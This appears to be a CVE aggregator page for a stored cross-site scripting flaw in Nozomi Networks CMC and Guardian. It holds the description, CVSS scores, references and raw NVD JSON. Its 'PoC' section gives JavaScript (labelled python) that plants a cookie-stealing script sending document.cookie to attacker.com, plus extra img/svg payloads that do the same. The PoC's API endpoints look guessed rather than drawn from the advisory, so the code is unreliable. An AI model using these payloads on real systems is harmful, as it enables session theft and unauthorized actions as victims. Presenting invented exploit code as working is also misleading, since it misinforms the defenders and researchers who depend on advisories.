CVE-2025-40892

Description

A Stored Cross-Site Scripting vulnerability was discovered in the Reports functionality due to improper validation of an input parameter. An authenticated user with report privileges can define a malicious report containing a JavaScript payload, or a victim can be socially engineered to import a malicious report template. When the victim views or imports the report, the XSS executes in their browser context, allowing the attacker to perform unauthorized actions as the victim, such as modify application data, disrupt application availability, and access limited sensitive information.

CVSS Details

CVSS Score

8.9

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nozominetworks:cmc:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:nozominetworks:guardian:*:*:*:*:*:*:*:* - VULNERABLE

Nozomi Networks产品 - 具体版本需参考官方安全公告NN-2025:13-01

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-40892 Stored XSS PoC // Target: Nozomi Networks Reports Functionality // Prerequisites: Valid user account with report privileges const axios = require('axios'); const TARGET_URL = 'https://target-system.com'; const USERNAME = '[email protected]'; const PASSWORD = 'password123'; async function exploit() { // Step 1: Authenticate const loginResponse = await axios.post(`${TARGET_URL}/api/auth/login`, { username: USERNAME, password: PASSWORD }); const sessionCookie = loginResponse.headers['set-cookie']; // Step 2: Create malicious report with XSS payload const xssPayload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'; const maliciousReport = { name: xssPayload, description: 'Malicious Report for CVE-2025-40892', type: 'custom', template: { content: xssPayload } }; // Step 3: Submit the malicious report await axios.post(`${TARGET_URL}/api/reports`, maliciousReport, { headers: { Cookie: sessionCookie } }); console.log('[+] Malicious report created successfully'); console.log('[+] When victim views this report, XSS will execute'); } exploit().catch(console.error); // Alternative simpler payload for testing: // <img src=x onerror="fetch('https://attacker.com/log?cookie='+document.cookie)"> // <svg/onload=fetch('https://attacker.com/exfil?data='+btoa(document.cookie))>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-40892
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-40892
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-40892/
[4] VulDB https://vuldb.com/cve/CVE-2025-40892
[5] https://security.nozominetworks.com/NN-2025:13-01
[6] https://cert-portal.siemens.com/productcert/html/ssa-827968.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-40892", "sourceIdentifier": "[email protected]", "published": "2025-12-18T14:15:59.457", "lastModified": "2026-04-14T10:16:27.033", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Stored Cross-Site Scripting vulnerability was discovered in the Reports functionality due to improper validation of an input parameter. An authenticated user with report privileges can define a malicious report containing a JavaScript payload, or a victim can be socially engineered to import a malicious report template. When the victim views or imports the report, the XSS executes in their browser context, allowing the attacker to perform unauthorized actions as the victim, such as modify application data, disrupt application availability, and access limited sensitive information."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:H", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:H", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nozominetworks:cmc:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.5.0", "matchCriteriaId": "91C795BB-9FFC-4FB0-B686-38DA32ACD478"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nozominetworks:guardian:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.5.0", "matchCriteriaId": "5FBA5D15-9BD3-4062-8560-FEB7FDF4180D"}]}]}], "references": [{"url": "https://security.nozominetworks.com/NN-2025:13-01", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://cert-portal.siemens.com/productcert/html/ssa-827968.html", "source": "0b142b55-0307-4c5a-b3c9-f314f3fb7c5e"}]}}